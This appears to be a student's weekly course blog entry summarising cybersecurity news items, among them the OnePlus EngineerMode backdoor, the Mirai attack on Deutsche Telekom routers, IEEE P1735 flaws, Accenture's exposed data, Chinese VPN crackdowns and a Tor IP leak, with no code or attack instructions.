Week 10: Web Application Hacking

This article starts with the concept that Schools should teach students learn how to stop malicious hackers by learning their ways. Imagine a world where security guards learn to be robbers first. The first step for students, before moving into a government or corporate job where they work to prevent hacks, is to learn the darker side of the trade: exploiting loopholes, thieving from servers, cracking passwords–and not just learningand performingthem, in a classroom set up especially for the experience. Students learn the tricks they need to break past a system’s defenses, but not when to use which tricks. Imagine getting the keys, not the locks is the analogy the author used. I think this article even though is a few years old relates to our program and what we are learning. The classes listed in this article have the same names as in our program.

It was discovered that all OnePlus devices that are running OxygenOS have a backdoor that allows anyone to gain root access. The application left available to be accessed is known as EngineerMode. A diagnostic testing application by Quacomm, EngineerMode was made to test hardware components of devices. It was designed to diagnose with GPS, root status, and various tests.

ADT is a well known security company for your home or business. If someone breaks to your house or business the system will call the police and alert someone that someone has tired to break in or has broken into the building. Now ADT is going into the cyber security realm they added another part of their business which will monitor the systems that are on your network to make sure that ou are not being hacked. The CEO says, “his company wants to protect physical locations as well as the networks attached to them.”

In Germani, a 29-year-old man who named by authorities as “Daniel K.,” was arrested ong the 22nd of February pleaded guilty in the court on Friday to charges related to the hijacking of more than one Million Deutsche Telekom routers.

According to reports in the German press, the cyber attacks powered by the notorious Mirai malware has been pleaded guilty to “attempted computer sabotage.” He was behind the cyber attack that knocked more than 1.25 Million customers of German telecommunications provider Deutsche Telekom offline last November.

According to the German authorities, the attack was especially severe and was carried out to compromise the home routers to enrol them in a network of hijacked devices popularly called Botnet, which is being offered for sale on dark web markets for launching DDoS attacks.

Late last year, Deutsche Telekom’s routers became infected with a modified version of the Mirai malware – infamous IoT malware which scans for insecure routers, cameras, DVRs, and other IoT devices and enslaves them into a botnet network – causing over a million pounds’ worth of damage, the company said at the time.
At the time of his arrest, the suspect faced up to 10 years in prison. He’s due to be sentenced on July 28. The BKA got involved in the investigation as the attack on Deutsche Telekom was deemed to be a threat to the nation’s communication infrastructure.

Security researchers have found weakness “in the Institute of Electrical and Electronics Engineers (IEEE) P1735 cryptography standard that can be exploited to unlock, modify or steal encrypted system-on-chip blueprints.” IEEE P1735 was designed to encrypt electronic-design intellectual property (IP) in the hardware and software. Most mobile and embedded devices include a System-on-Chip (SoC), a circuit that consists of multiple IPS that range from radio-frequency receiver to cryptographic engine from different vendors.

Published by the Department of Homeland Security’s US-CERT, IEEE P1735 is flawed. It was discovered that there was seven vulnerabilities that were found.

On the heels Deloitte’s security vulnerability coming to light another company large in the cyber security space reportedly suffers from lax cyber security themselves. The article explains that Accenture had a large cache of sensitive information on their cloud stage without it being password protection. It is believed that the information is now secure without incident but I think it is probably too soon to be sure that it wasn’t accessed by someone with malicious intent. Like with Deloitte, it draws into question Accenture’s credibility in that they recommend to their clients best cyber security practices but fail to follow them themselves.

I found this article interesting since it relates to a prior discussion the class had about an organization’s data when having an international site in China. Even though China is the world’s second largest economy, a lot of things are becoming less free regarding digital communication. The country’s regulators are becoming more aggressive on what more than 750 million users can and cannot do online. This year, the country has become quite strict on the most popular video-streaming websites, cracked down on their VPNs, removed foreign TV shows from online platforms, required users to register to online forums with their real names and introduced laws that hold chat group admins accountable for what is being said in their spaces. Additionally, the new laws require online news websites to be overseen by the government. China internet users have expressed frustration towards these changes. A student from the mainland relied on VPNs to connect to the outside world. Another stated they utilized VPNs to allow them access to YouTube and other reference websites that helped them with their class work. I could not imagine the government pretty much controlling my every move on the internet. Like the one student from China explained, she used a lot of outside sites to help with course work as a lot of people do around the world. China seems to be taking the control to the next extreme, which based off feedback is hurting more than helping. I could never imagine not having access to Google at any point which is a source a majority of the people rely on to find websites and get questions answered.

This article describes that researchers have found a critical vulnerability that users could leak their real IP addresses to potential attackers when they use TOR anonymity browser. Tor (The Onion Router) is free software for enabling anonymous communication and was initially a worldwide network of servers developed with the U.S Navy that enabled people to browse the internet anonymously. Now it’s a non-profit organization whose main purpose it the research and development of online privacy tools. According to the article, the security researcher Filippo Cavallarin mentions that the vulnerability resides in FireFox that eventually affects Tor Browser since the privacy-aware service that allows users to surf the web anonymously uses FireFox at its core. The security researcher also describes that the vulnerability currently only effect for MacOS and Linux users only. However, the research warning Tor users to be aware of this vulnerability.

A good area where AI, and machine learning will help the cyber industry. Information is critical to an IT organization especially during an incident. With unstructured data, data that is not in their SIEMs, it is a challenge for them to get ahead of threats.